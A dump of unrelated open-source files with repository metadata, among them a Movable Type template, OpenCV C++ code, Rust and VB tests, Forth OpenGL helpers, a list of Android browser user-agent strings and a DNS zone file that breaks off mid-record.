<mt:Include module="記事ループ-装飾なし" /> <mt:Else> <mt:Include module="記事ループ-メディア" /> </mt:If> <mt:SetVarBlock name="__post_par__"><mt:Var name="__counter__" op="%" value="3" /></mt:SetVarBlock> <mt:If name="ec_component" eq="card"> <mt:If name="__post_par__" eq="0"> <!-- /.row --></div> <div class="row js-flatheight"> </mt:If> </mt:If> <mt:PageContentsFooter> <mt:If name="ec_component" eq="card"> <!-- /.row --></div> </mt:If> <!-- /.archive-list --></div> </mt:PageContentsFooter> <mt:PageSeparator /> </mt:Entries> </mt:PageContents> <mt:Include module="ナビ-ページネーション" /> <mt:SetVar name="__topicpath_count__" value="0" /> <nav class="topicpath"> <ol class="breadcrumb"<mt:Var name="ec_itemscope_ol">> <li<mt:Var name="ec_itemscope_li">> <a href="<mt:Var name="ec_website_path" />"<mt:Var name="ec_itemscope_a">><span<mt:Var name="ec_itemscope_span">><mt:Var name="ec_breadcrumb_home_label" encode_html="1" /></span></a> <mt:Var name="__topicpath_count__" op="++" setvar="__topicpath_count__" /> <meta itemprop="position" content="<mt:Var name="__topicpath_count__">"> </li> <mt:IfWebsite note="ブログであればブログトップへのリンクを追加"> <mt:Else> <li<mt:Var name="ec_itemscope_li">> <a href="<mt:BlogRelativeURL />"<mt:Var name="ec_itemscope_a">><span<mt:Var name="ec_itemscope_span">><mt:BlogName encode_html="1" /></span></a> <mt:Var name="__topicpath_count__" op="++" setvar="__topicpath_count__" /> <meta itemprop="position" content="<mt:Var name="__topicpath_count__">"> </li> </mt:IfWebsite> <li class="active"<mt:Var name="ec_itemscope_li">> <span<mt:Var name="ec_itemscope_span">><mt:Var name="ec_blog_contents_label" /></span> <mt:Var name="__topicpath_count__" op="++" setvar="__topicpath_count__" /> <meta itemprop="position" content="<mt:Var name="__topicpath_count__">"> </li> </ol> </nav> <mt:WidgetSet name="コンテンツ-本文の後-ブログ" /> </main> <!-- /.col-md-12 col-lg-9 --></div> <div class="col-md-12 col-lg-3"> <div class="sub"> <mt:Var name="__is_sub__" value="1" /> <mt:WidgetSet name="サブメニュー-ブログ" /> <mt:Var name="__is_sub__" value="0" /> <!-- /.sub --></div> <!-- /.col-md-12 col-lg-3 --></div> <!-- /.row --></div> <!-- /.container --></div> <div class="section section-03"> <div class="container"> <mt:WidgetSet name="コンテンツ-下段" /> <!-- /.container --></div> <!-- /.section section-03 --></div> <!-- /.contents --></div> <mt:Include module="フッタ" /> <mt:Include module="デバッグ-アーカイブ" /> </body> </html> </mt:Unless>
MTML
3
webbingstudio/mt_theme_echo_bootstrap
dist/themes/echo_bootstrap/_pagebute/blog_index_paging.mtml
[ "MIT" ]
{{! Copyright (c) Avanade. Licensed under the MIT License. See https://github.com/Avanade/Beef }} /* * This file is automatically generated; any changes will be lost. */ #nullable enable #pragma warning disable using System.Collections.Generic; using System.Data; using Beef.Data.Database; using Beef.Data.Database.Cdc; namespace {{Root.NamespaceCdcPublisher}}.Data { /// <summary> /// Provides the <see cref="CdcTracker"/> data mapper. /// </summary> public class CdcTrackingDbMapper : CdcTrackingDbMapperBase { /// <summary> /// Initializes a new instance of the <see cref="CdcTrackingDbMapper"/> class. /// </summary> public CdcTrackingDbMapper() : base("[{{Root.CdcSchema}}].[udt{{Root.CdcTrackingTableName}}List]") { } } } #pragma warning restore #nullable restore
Harbour
4
ciaranodonnell/Beef
tools/Beef.CodeGen.Core/Templates/DbCdcTrackingTvp_cs.hb
[ "MIT" ]
{ "funds": [] }
Max
0
ZhengGuoDeveloper/steem
python_scripts/tests/api_tests/database_api/get_reward_funds.json.pat
[ "MIT" ]
<x><![CDATA[ declare namespace m0="http://services.samples"; declare variable $payload as document-node() external; declare variable $commission as document-node() external; <m0:return xmlns:m0="http://services.samples" xmlns:m1="http://services.samples/xsd"> <m1:symbol>{$payload//m0:return/m1:symbol/child::text()}</m1:symbol> <m1:last>{$payload//m0:return/m1:last/child::text()+ $commission//commission/vendor[@symbol=$payload//m0:return/m1:symbol/child::text()]}</m1:last> </m0:return> ]]></x>
XQuery
3
isuruuy429/product-ei
samples/product/src/main/conf/synapse/resources/xquery/xquery_commisson.xq
[ "Apache-2.0" ]
{ "@context": {"foo": {"@id": "http://example.com/foo", "@container": "@list"}}, "foo": [{"@list": ["baz"]}] }
JSONLD
2
fsteeg/json-ld-api
tests/expand/li03-in.jsonld
[ "W3C" ]
// This file is part of OpenCV project. // It is subject to the license terms in the LICENSE file found in the top-level directory // of this distribution and at http://opencv.org/license.html. // // Copyright (C) 2021 Intel Corporation #include "streaming/onevpl/accelerators/surface/dx11_frame_adapter.hpp" #include "streaming/onevpl/accelerators/dx11_alloc_resource.hpp" #include "streaming/onevpl/accelerators/surface/surface.hpp" #include "logger.hpp" #ifdef HAVE_ONEVPL #include "streaming/onevpl/onevpl_export.hpp" #ifdef HAVE_INF_ENGINE // For IE classes (ParamMap, etc) #include <inference_engine.hpp> #endif // HAVE_INF_ENGINE namespace cv { namespace gapi { namespace wip { namespace onevpl { void lock_mid(mfxMemId mid, mfxFrameData &data, MediaFrame::Access mode) { LockAdapter* alloc_data = reinterpret_cast<LockAdapter *>(mid); if (mode == MediaFrame::Access::R) { alloc_data->read_lock(mid, data); } else { alloc_data->write_lock(mid, data); } } void unlock_mid(mfxMemId mid, mfxFrameData &data, MediaFrame::Access mode) { LockAdapter* alloc_data = reinterpret_cast<LockAdapter*>(data.MemId); if (mode == MediaFrame::Access::R) { alloc_data->unlock_read(mid, data); } else { alloc_data->unlock_write(mid, data); } } VPLMediaFrameDX11Adapter::VPLMediaFrameDX11Adapter(std::shared_ptr<Surface> surface): parent_surface_ptr(surface) { GAPI_Assert(parent_surface_ptr && "Surface is nullptr"); const Surface::info_t& info = parent_surface_ptr->get_info(); Surface::data_t& data = parent_surface_ptr->get_data(); GAPI_LOG_DEBUG(nullptr, "surface: " << parent_surface_ptr->get_handle() << ", w: " << info.Width << ", h: " << info.Height << ", p: " << data.Pitch); switch(info.FourCC) { case MFX_FOURCC_I420: throw std::runtime_error("MediaFrame doesn't support I420 type"); break; case MFX_FOURCC_NV12: frame_desc.fmt = MediaFormat::NV12; break; default: throw std::runtime_error("MediaFrame unknown 'fmt' type: " + std::to_string(info.FourCC)); } frame_desc.size = cv::Size{info.Width, info.Height}; LockAdapter* alloc_data = reinterpret_cast<LockAdapter*>(data.MemId); alloc_data->set_adaptee(this); parent_surface_ptr->obtain_lock(); } VPLMediaFrameDX11Adapter::~VPLMediaFrameDX11Adapter() { // Each VPLMediaFrameDX11Adapter releases mfx surface counter // The last VPLMediaFrameDX11Adapter releases shared Surface pointer // The last surface pointer releases workspace memory Surface::data_t& data = parent_surface_ptr->get_data(); LockAdapter* alloc_data = reinterpret_cast<LockAdapter*>(data.MemId); alloc_data->set_adaptee(nullptr); parent_surface_ptr->release_lock(); } cv::GFrameDesc VPLMediaFrameDX11Adapter::meta() const { return frame_desc; } MediaFrame::View VPLMediaFrameDX11Adapter::access(MediaFrame::Access mode) { Surface::data_t& data = parent_surface_ptr->get_data(); const Surface::info_t& info = parent_surface_ptr->get_info(); void* frame_id = reinterpret_cast<void*>(this); GAPI_LOG_DEBUG(nullptr, "START lock frame in surface: " << parent_surface_ptr->get_handle() << ", frame id: " << frame_id); // lock MT lock_mid(data.MemId, data, mode); GAPI_LOG_DEBUG(nullptr, "FINISH lock frame in surface: " << parent_surface_ptr->get_handle() << ", frame id: " << frame_id); using stride_t = typename cv::MediaFrame::View::Strides::value_type; stride_t pitch = static_cast<stride_t>(data.Pitch); // NB: make copy for some copyable object, because access release may be happened // after source/pool destruction, so we need a copy auto parent_surface_ptr_copy = parent_surface_ptr; switch(info.FourCC) { case MFX_FOURCC_I420: { GAPI_Assert(data.Y && data.U && data.V && "MFX_FOURCC_I420 frame data is nullptr"); cv::MediaFrame::View::Ptrs pp = { data.Y, data.U, data.V, nullptr }; cv::MediaFrame::View::Strides ss = { pitch, pitch / 2, pitch / 2, 0u }; return cv::MediaFrame::View(std::move(pp), std::move(ss), [parent_surface_ptr_copy, frame_id, mode] () { parent_surface_ptr_copy->obtain_lock(); auto& data = parent_surface_ptr_copy->get_data(); GAPI_LOG_DEBUG(nullptr, "START unlock frame in surface: " << parent_surface_ptr_copy->get_handle() << ", frame id: " << frame_id); unlock_mid(data.MemId, data, mode); GAPI_LOG_DEBUG(nullptr, "FINISH unlock frame in surface: " << parent_surface_ptr_copy->get_handle() << ", frame id: " << frame_id); parent_surface_ptr_copy->release_lock(); }); } case MFX_FOURCC_NV12: { if (!data.Y || !data.UV) { GAPI_LOG_WARNING(nullptr, "Empty data detected!!! for surface: " << parent_surface_ptr->get_handle() << ", frame id: " << frame_id); } GAPI_Assert(data.Y && data.UV && "MFX_FOURCC_NV12 frame data is nullptr"); cv::MediaFrame::View::Ptrs pp = { data.Y, data.UV, nullptr, nullptr }; cv::MediaFrame::View::Strides ss = { pitch, pitch, 0u, 0u }; return cv::MediaFrame::View(std::move(pp), std::move(ss), [parent_surface_ptr_copy, frame_id, mode] () { parent_surface_ptr_copy->obtain_lock(); auto& data = parent_surface_ptr_copy->get_data(); GAPI_LOG_DEBUG(nullptr, "START unlock frame in surface: " << parent_surface_ptr_copy->get_handle() << ", frame id: " << frame_id); unlock_mid(data.MemId, data, mode); GAPI_LOG_DEBUG(nullptr, "FINISH unlock frame in surface: " << parent_surface_ptr_copy->get_handle() << ", frame id: " << frame_id); parent_surface_ptr_copy->release_lock(); }); } break; default: throw std::runtime_error("MediaFrame unknown 'fmt' type: " + std::to_string(info.FourCC)); } } cv::util::any VPLMediaFrameDX11Adapter::blobParams() const { #ifdef HAVE_INF_ENGINE GAPI_Assert(false && "VPLMediaFrameDX11Adapter::blobParams() is not fully operable " "in G-API streaming. Please waiting for future PRs"); Surface::data_t& data = parent_surface_ptr->get_data(); NativeHandleAdapter* native_handle_getter = reinterpret_cast<NativeHandleAdapter*>(data.MemId); mfxHDLPair handle{}; native_handle_getter->get_handle(data.MemId, reinterpret_cast<mfxHDL&>(handle)); InferenceEngine::ParamMap params{{"SHARED_MEM_TYPE", "VA_SURFACE"}, {"DEV_OBJECT_HANDLE", handle.first}, {"COLOR_FORMAT", InferenceEngine::ColorFormat::NV12}, {"VA_PLANE", static_cast<DX11AllocationItem::subresource_id_t>( reinterpret_cast<uint64_t>( reinterpret_cast<DX11AllocationItem::subresource_id_t *>( handle.second)))}};//, const Surface::info_t& info = parent_surface_ptr->get_info(); InferenceEngine::TensorDesc tdesc({InferenceEngine::Precision::U8, {1, 3, static_cast<size_t>(info.Height), static_cast<size_t>(info.Width)}, InferenceEngine::Layout::NCHW}); return std::make_pair(tdesc, params); #else GAPI_Assert(false && "VPLMediaFrameDX11Adapter::blobParams() is not implemented"); #endif // HAVE_INF_ENGINE } void VPLMediaFrameDX11Adapter::serialize(cv::gapi::s11n::IOStream&) { GAPI_Assert(false && "VPLMediaFrameDX11Adapter::serialize() is not implemented"); } void VPLMediaFrameDX11Adapter::deserialize(cv::gapi::s11n::IIStream&) { GAPI_Assert(false && "VPLMediaFrameDX11Adapter::deserialize() is not implemented"); } DXGI_FORMAT VPLMediaFrameDX11Adapter::get_dx11_color_format(uint32_t mfx_fourcc) { switch (mfx_fourcc) { case MFX_FOURCC_NV12: return DXGI_FORMAT_NV12; case MFX_FOURCC_YUY2: return DXGI_FORMAT_YUY2; case MFX_FOURCC_RGB4: return DXGI_FORMAT_B8G8R8A8_UNORM; case MFX_FOURCC_P8: case MFX_FOURCC_P8_TEXTURE: return DXGI_FORMAT_P8; case MFX_FOURCC_ARGB16: case MFX_FOURCC_ABGR16: return DXGI_FORMAT_R16G16B16A16_UNORM; case MFX_FOURCC_P010: return DXGI_FORMAT_P010; case MFX_FOURCC_A2RGB10: return DXGI_FORMAT_R10G10B10A2_UNORM; case DXGI_FORMAT_AYUV: case MFX_FOURCC_AYUV: return DXGI_FORMAT_AYUV; default: return DXGI_FORMAT_UNKNOWN; } } } // namespace onevpl } // namespace wip } // namespace gapi } // namespace cv #endif // HAVE_ONEVPL
C++
4
nowireless/opencv
modules/gapi/src/streaming/onevpl/accelerators/surface/dx11_frame_adapter.cpp
[ "Apache-2.0" ]
prod: 'G@role:sub': - match: compound - issue-8196
SaltStack
0
byteskeptical/salt
tests/integration/files/file/prod/top.sls
[ "Apache-2.0" ]
--# -path=.:alltenses:prelude:../latvian resource CombinatorsLav = Combinators with (Cat = CatLav), (Structural = StructuralLav), (Constructors = ConstructorsLav) ;
Grammatical Framework
3
daherb/gf-rgl
src/api/CombinatorsLav.gf
[ "BSD-3-Clause" ]
// run-pass // Regression test for #55846, which once caused an ICE. use std::marker::PhantomData; struct Foo; struct Bar<A> { a: PhantomData<A>, } impl Fooifier for Foo { type Assoc = Foo; } trait Fooifier { type Assoc; } trait Barifier<H> { fn barify(); } impl<H> Barifier<H> for Bar<H> { fn barify() { println!("All correct!"); } } impl Bar<<Foo as Fooifier>::Assoc> { fn this_shouldnt_crash() { <Self as Barifier<<Foo as Fooifier>::Assoc>>::barify(); } } fn main() { Bar::<Foo>::this_shouldnt_crash(); }
Rust
4
Eric-Arellano/rust
src/test/ui/issues/issue-55846.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
' Licensed to the .NET Foundation under one or more agreements. ' The .NET Foundation licenses this file to you under the MIT license. ' See the LICENSE file in the project root for more information. 'vbc /t:library /out:MTTestLib1.Dll MTTestLib1_V1.vb 'vbc /t:module /out:MTTestModule1.netmodule MTTestLib1_V1.vb <Assembly: System.Reflection.AssemblyVersion("1.0.0.0")> <Assembly: System.Reflection.AssemblyFileVersion("1.0.0.0")> Public Class Class1 End Class Public Delegate Sub Delegate1() Public Interface Interface1 Sub Method1() ' same in V2 Sub Method2() ' gone in V2 Sub Method3(x As Boolean) ' different param type in V2 Sub Method4(x As Class1) ' new version of param type in V2 Property Property1 As String ' same in V2 Property Property2 As String ' gone in V2 Property Property3 As String ' different type in V2 Property Property4 As Class1 ' new version of type in V2 Default Property Indexer(x As String) As String ' same in V2 Default Property Indexer(x As String, y As String) As String ' gone in V2 Default Property Indexer(x As String, y As String, z As String) As String ' different type in V2 Default Property Indexer(x As Class1, y As Class1, z As Class1, w As Class1) As Class1 ' new version of type in V2 Event Event1 As System.Action ' same in V2 Event Event2 As System.Action ' gone in V2 Event Event3 As System.Action ' different type in V2 Event Event4 As Delegate1 ' new version of type in V2 End Interface Public Interface Interface2(Of T) Sub Method1(t As T) ' same in V2 Property Property1 As T ' same in V2 Event Event1 As System.Action(Of T) ' same in V2 End Interface
Visual Basic
3
ffMathy/roslyn
src/Compilers/Test/Resources/Core/SymbolsTests/V1/MTTestLib1_V1.vb
[ "MIT" ]
\ Tools to perform some common OpenGL operations \needs GL_NONE fl glconstants.fth #640 value width #640 value height $00033002 constant GLFW_STICKY_KEYS $00020005 constant GLFW_DECORATED 0 value win : glfw-setup ( -- ) set-error-callback glfwInit 0= abort" glfwInit failed" \ 0 GLFW_DECORATED glfwWindowHint 0 0 " Nod Backspin Test" height width glfwCreateWindow to win win glfwMakeContextCurrent 1 glfwSwapInterval glewInit 1 GLFW_STICKY_KEYS win glfwSetInputMode ; 0 value GLFW_RELEASE 1 value GLFW_PRESS 2 value GLFW_REPEAT #32 constant GLFW_KEY_SPACE #48 constant GLFW_KEY_0 #65 constant GLFW_KEY_A #256 constant GLFW_KEY_ESC #257 constant GLFW_KEY_ENTER : >glfw-key ( char -- n ) dup bl = if drop GLFW_KEY_SPACE exit then upc dup 'A' 'Z' between if ( char ) 'A' - GLFW_KEY_A + exit ( -- n ) then ( char ) dup '0' '9' between if ( char ) '0' - GLFW_KEY_0 + exit ( -- n ) then ( char ) drop true abort" Unsupported GLFW key" \ Not yet supporting ',-./;=[\]` \ Not yet supporting Esc Enter Tab Backspace Insert Delete Left Right Up Down \ and others ; : glfw-key? ( keycode -- flag ) dup win glfwGetKey if ( keycode ) begin ( keycode ) glfwPollEvents ( keycode ) dup win glfwGetKey ( keycode pressed? ) 0= until ( keycode ) drop true ( true ) else ( keycode ) drop false ( false ) then ( flag ) ; 0 value eroll 0 value pitch 0 value yaw : rpy to yaw to pitch to eroll ; defer rotation : rpy-rotation ( -- ) 0f 1f 0f eroll float glRotate 0f 0f 1f pitch float fnegate glRotate 1f 0f 0f yaw float fnegate glRotate ; ' rpy-rotation to rotation : projection ( -- ) GL_PROJECTION glMatrixMode glLoadIdentity ; : model ( -- ) GL_MODELVIEW glMatrixMode glLoadIdentity ; : pixel-coordinates ( -- ) projection 1f -1f height float 0 width float 0 glOrtho ; : gl-clear ( -- ) GL_DEPTH_BUFFER_BIT GL_COLOR_BUFFER_BIT or glClear ; : full-viewport ( -- ) height width 0 0 glViewport ; : 3d-view ( -- ) projection glLoadIdentity -70f 70f -70f 70f 70f -70f glOrtho model glLoadIdentity 0f 1f 0f 0f 0f 0f 1f 1f 0.3f gluLookAt ; : setup-view full-viewport gl-clear 3d-view ; : vertex{ ( -- ) gl-clear GL_VERTEX_ARRAY glEnableClientState ; : }vertex ( -- ) GL_VERTEX_ARRAY glDisableClientState ; : swap-buffers ( -- ) win glfwSwapBuffers ; : setup-buffer ( adr len type 'id -- ) dup 1 glGenBuffers ( adr len type 'id ) l@ over glBindBuffer ( adr len type ) >r GL_STATIC_DRAW -rot r> glBufferData ( ) ; : .3floats ( adr -- ) >r r@ sf@ f. r@ 1 sfloats + sf@ f. r> 2 sfloats + sf@ f. ; : .// ( n -- ) dup (.) type ." //" (.) type ; \ These can be used only when lighting/shading is off : white ( -- ) 1.0f 1.0f 1.0f glColor3 ; : red ( -- ) 0.0f 0.0f 1.0f glColor3 ; : green ( -- ) 0.0f 1.0f 0.0f glColor3 ; : blue ( -- ) 1.0f 0.0f 0.0f glColor3 ; : cyan ( -- ) 1.0f 1.0f 0.5f glColor3 ; : magenta ( -- ) 1.0f 0.5f 1.0f glColor3 ; : yellow ( -- ) 0.5f 1.0f 1.0f glColor3 ; : pink ( -- ) 0.5f 0.5f 1.0f glColor3 ; : light-green ( -- ) 0.5f 1.0f 0.5f glColor3 ; : half 0.5f 0.5f 0.5f glScale ; : double 2f 2f 2f glScale ; create ambient0 0.3f sf, 0.3f sf, 0.3f sf, 1f sf, \ create ambient0 0.2f sf, 0.2f sf, 0.2f sf, 1f sf, create diffuse0 0.3f sf, 0.3f sf, 0.3f sf, 1f sf, create specular0 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, \ create specular0 0.2f sf, 0.2f sf, 0.2f sf, 1f sf, create position0 -30f sf, -30.f sf, -10.f sf, 1f sf, create ambient1 .05f sf, .05f sf, .05f sf, 1f sf, create diffuse1 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create specular1 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create position1 -10f sf, 5.0f sf, -30.f sf, 1f sf, create ambient2 .05f sf, .05f sf, .05f sf, 1f sf, create diffuse2 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create specular2 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create position2 10f sf, 5.0f sf, -30.f sf, 1f sf, create ambient3 .05f sf, .05f sf, .05f sf, 1f sf, create diffuse3 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create specular3 0.1f sf, 0.1f sf, 0.1f sf, 1f sf, create position3 0.0f sf, 20.0f sf, 0.0f sf, 1f sf, create reflect 0.8f sf, 0.8f sf, 0.8f sf, 1f sf, create mcolor 0.75f sf, 0.75f sf, 0.75f sf, 1f sf, : lighting 0f 0f 0f 0f glClearColor \ Black background 1f glClearDepth GL_DEPTH_TEST glEnable GL_LEQUAL glDepthFunc GL_SMOOTH glShadeModel \ GL_FLAT glShadeModel GL_LIGHTING glEnable GL_LIGHT0 glEnable GL_LIGHT1 glEnable GL_LIGHT2 glEnable GL_LIGHT3 glEnable ambient0 GL_AMBIENT GL_LIGHT0 glLightfv diffuse0 GL_DIFFUSE GL_LIGHT0 glLightfv specular0 GL_SPECULAR GL_LIGHT0 glLightfv position0 GL_POSITION GL_LIGHT0 glLightfv ambient1 GL_AMBIENT GL_LIGHT1 glLightfv diffuse1 GL_DIFFUSE GL_LIGHT1 glLightfv specular1 GL_SPECULAR GL_LIGHT1 glLightfv position1 GL_POSITION GL_LIGHT1 glLightfv ambient2 GL_AMBIENT GL_LIGHT2 glLightfv diffuse2 GL_DIFFUSE GL_LIGHT2 glLightfv specular2 GL_SPECULAR GL_LIGHT2 glLightfv position2 GL_POSITION GL_LIGHT2 glLightfv ambient3 GL_AMBIENT GL_LIGHT3 glLightfv diffuse3 GL_DIFFUSE GL_LIGHT3 glLightfv specular3 GL_SPECULAR GL_LIGHT3 glLightfv position3 GL_POSITION GL_LIGHT3 glLightfv GL_CW glFrontFace mcolor GL_AMBIENT_AND_DIFFUSE GL_FRONT glMaterialfv reflect GL_SPECULAR GL_FRONT glMaterialfv #50 GL_SHININESS GL_FRONT glMateriali ;
Forth
5
andrewtholt/cforth-ath
src/app/glfw/gltools.fth
[ "MIT" ]
<svg xmlns="http://www.w3.org/2000/svg" enable-background="new 0 0 24 24" height="24" viewBox="0 0 24 24" width="24"><rect fill="none" height="24" width="24"/><path d="M15.31,18.9c-0.96,1-2.06,2.03-3.31,3.1c-5.33-4.55-8-8.48-8-11.8C4,5.22,7.8,2,12,2c4,0,7.64,2.92,7.97,7.5l3.53,0L19,14 l-4.5-4.5l3.47,0C17.65,6.24,15.13,4,12,4c-3.35,0-6,2.57-6,6.2c0,2.34,1.95,5.44,6,9.14c0.64-0.59,1.23-1.16,1.77-1.71 c-0.17-0.34-0.27-0.72-0.27-1.12c0-1.38,1.12-2.5,2.5-2.5s2.5,1.12,2.5,2.5S17.38,19,16,19C15.76,19,15.53,18.97,15.31,18.9z"/></svg>
SVG
1
dany-freeman/material-ui
packages/mui-icons-material/material-icons/mode_of_travel_two_tone_24px.svg
[ "MIT" ]
--- title: Maintenance mode layout: error error: maintenance menu: base.error.maintenance ---
HTML
0
muhginanjar/tabler
src/pages/error-maintenance.html
[ "MIT" ]
Mozilla/5.0 (Linux; U; Android 4.0.4; ko-kr; LG-LU6200 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; LG-LU6200 Build/GRJ90) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Mozilla/5.0 (Linux; U; Android 4.0.4; ko-kr; LG-LU6200 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 NAVER(inapp; search; 210; 4.4.1) Mozilla/5.0 (Linux; Android 4.0.4; fr-FR; LG-LU6200 Build/IMM76D) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mozilla/5.0 (Linux; Android 4.0.4; LG-LU6200 Build/IMM76D) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; LG-LU6200 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Text
0
5tr1x/SecLists
Fuzzing/User-Agents/operating-platform/lg-lu6200.txt
[ "MIT" ]
; replace the trust-dns.org with your own name @ 86400 IN SOA example.net. root.example.net. ( 20210101 ; Serial 28800 ; Refresh 7200 ; Retry 604800 ; Expire 86400) ; Minimum TTL NS trust-dns.org. www1 A 127.0.0.1 AAAA ::1 www2 A 127.0.0.1 AAAA ::1 www3 A 127.0.0.1 AAAA ::1 www4 A 127.0.0.1 AAAA ::1 www5 A 127.0.0.1 AAAA ::1 www6 A 127.0.0.1 AAAA ::1 www7 A 127.0.0.1 AAAA ::1 www8 A 127.0.0.1 AAAA ::1 www9 A 127.0.0.1 AAAA ::1 www10 A 127.0.0.1 AAAA ::1 www11 A 127.0.0.1 AAAA ::1 www12 A 127.0.0.1 AAAA ::1 www13 A 127.0.0.1 AAAA ::1 www14 A 127.0.0.1 AAAA ::1 www15 A 127.0.0.1 AAAA ::1 www16 A 127.0.0.1 AAAA ::1 www17 A 127.0.0.1 AAAA ::1 www18 A 127.0.0.1 AAAA ::1 www19 A 127.0.0.1 AAAA ::1 www20 A 127.0.0.1 AAAA ::1 www21 A 127.0.0.1 AAAA ::1 www22 A 127.0.0.1 AAAA ::1 www23 A 127.0.0.1 AAAA ::1 www24 A 127.0.0.1 AAAA ::1 www25 A 127.0.0.1 AAAA ::1 www26 A 127.0.0.1 AAAA ::1 www27 A 127.0.0.1 AAAA ::1 www28 A 127.0.0.1 AAAA ::1 www29 A 127.0.0.1 AAAA ::1 www30 A 127.0.0.1 AAAA ::1 www31 A 127.0.0.1 AAAA ::1 www32 A 127.0.0.1 AAAA ::1 www33 A 127.0.0.1 AAAA ::1 www34 A 127.0.0.1 AAAA ::1 www35 A 127.0.0.1 AAAA ::1 www36 A 127.0.0.1 AAAA ::1 www37 A 127.0.0.1 AAAA ::1 www38 A 127.0.0.1 AAAA ::1 www39 A 127.0.0.1 AAAA ::1 www40 A 127.0.0.1 AAAA ::1 www41 A 127.0.0.1 AAAA ::1 www42 A 127.0.0.1 AAAA ::1 www43 A 127.0.0.1 AAAA ::1 www44 A 127.0.0.1 AAAA ::1 www45 A 127.0.0.1 AAAA ::1 www46 A 127.0.0.1 AAAA ::1 www47 A 127.0.0.1 AAAA ::1 www48 A 127.0.0.1 AAAA ::1 www49 A 127.0.0.1 AAAA ::1 www50 A 127.0.0.1 AAAA ::1 www51 A 127.0.0.1 AAAA ::1 www52 A 127.0.0.1 AAAA ::1 www53 A 127.0.0.1 AAAA ::1 www54 A 127.0.0.1 AAAA ::1 www55 A 127.0.0.1 AAAA ::1 www56 A 127.0.0.1 AAAA ::1 www57 A 127.0.0.1 AAAA ::1 www58 A 127.0.0.1 AAAA ::1 www59 A 127.0.0.1 AAAA ::1 www60 A 127.0.0.1 AAAA ::1 www61 A 127.0.0.1 AAAA ::1 www62 A 127.0.0.1 AAAA ::1 www63 A 127.0.0.1 AAAA ::1 www64 A 127.0.0.1 AAAA ::1 www65 A 127.0.0.1 AAAA ::1 www66 A 127.0.0.1 AAAA ::1 www67 A 127.0.0.1 AAAA ::1 www68 A 127.0.0.1 AAAA ::1 www69 A 127.0.0.1 AAAA ::1 www70 A 127.0.0.1 AAAA ::1 www71 A 127.0.0.1 AAAA ::1 www72 A 127.0.0.1 AAAA ::1 www73 A 127.0.0.1 AAAA ::1 www74 A 127.0.0.1 AAAA ::1 www75 A 127.0.0.1 AAAA ::1 www76 A 127.0.0.1 AAAA ::1 www77 A 127.0.0.1 AAAA ::1 www78 A 127.0.0.1 AAAA ::1 www79 A 127.0.0.1 AAAA ::1 www80 A 127.0.0.1 AAAA ::1 www81 A 127.0.0.1 AAAA ::1 www82 A 127.0.0.1 AAAA ::1 www83 A 127.0.0.1 AAAA ::1 www84 A 127.0.0.1 AAAA ::1 www85 A 127.0.0.1 AAAA ::1 www86 A 127.0.0.1 AAAA ::1 www87 A 127.0.0.1 AAAA ::1 www88 A 127.0.0.1 AAAA ::1 www89 A 127.0.0.1 AAAA ::1 www90 A 127.0.0.1 AAAA ::1 www91 A 127.0.0.1 AAAA ::1 www92 A 127.0.0.1 AAAA ::1 www93 A 127.0.0.1 AAAA ::1 www94 A 127.0.0.1 AAAA ::1 www95 A 127.0.0.1 AAAA ::1 www96 A 127.0.0.1 AAAA ::1 www97 A 127.0.0.1 AAAA ::1 www98 A 127.0.0.1 AAAA ::1 www99 A 127.0.0.1 AAAA ::1 www100 A 127.0.0.1 AAAA ::1 www101 A 127.0.0.1 AAAA ::1 www102 A 127.0.0.1 AAAA ::1 www103 A 127.0.0.1 AAAA ::1 www104 A 127.0.0.1 AAAA ::1 www105 A 127.0.0.1 AAAA ::1 www106 A 127.0.0.1 AAAA ::1 www107 A 127.0.0.1 AAAA ::1 www108 A 127.0.0.1 AAAA ::1 www109 A 127.0.0.1 AAAA ::1 www110 A 127.0.0.1 AAAA ::1 www111 A 127.0.0.1 AAAA ::1 www112 A 127.0.0.1 AAAA ::1 www113 A 127.0.0.1 AAAA ::1 www114 A 127.0.0.1 AAAA ::1 www115 A 127.0.0.1 AAAA ::1 www116 A 127.0.0.1 AAAA ::1 www117 A 127.0.0.1 AAAA ::1 www118 A 127.0.0.1 AAAA ::1 www119 A 127.0.0.1 AAAA ::1 www120 A 127.0.0.1 AAAA ::1 www121 A 127.0.0.1 AAAA ::1 www122 A 127.0.0.1 AAAA ::1 www123 A 127.0.0.1 AAAA ::1 www124 A 127.0.0.1 AAAA ::1 www125 A 127.0.0.1 AAAA ::1 www126 A 127.0.0.1 AAAA ::1 www127 A 127.0.0.1 AAAA ::1 www128 A 127.0.0.1 AAAA ::1 www129 A 127.0.0.1 AAAA ::1 www130 A 127.0.0.1 AAAA ::1 www131 A 127.0.0.1 AAAA ::1 www132 A 127.0.0.1 AAAA ::1 www133 A 127.0.0.1 AAAA ::1 www134 A 127.0.0.1 AAAA ::1 www135 A 127.0.0.1 AAAA ::1 www136 A 127.0.0.1 AAAA ::1 www137 A 127.0.0.1 AAAA ::1 www138 A 127.0.0.1 AAAA ::1 www139 A 127.0.0.1 AAAA ::1 www140 A 127.0.0.1 AAAA ::1 www141 A 127.0.0.1 AAAA ::1 www142 A 127.0.0.1 AAAA ::1 www143 A 127.0.0.1 AAAA ::1 www144 A 127.0.0.1 AAAA ::1 www145 A 127.0.0.1 AAAA ::1 www146 A 127.0.0.1 AAAA ::1 www147 A 127.0.0.1 AAAA ::1 www148 A 127.0.0.1 AAAA ::1 www149 A 127.0.0.1 AAAA ::1 www150 A 127.0.0.1 AAAA ::1 www151 A 127.0.0.1 AAAA 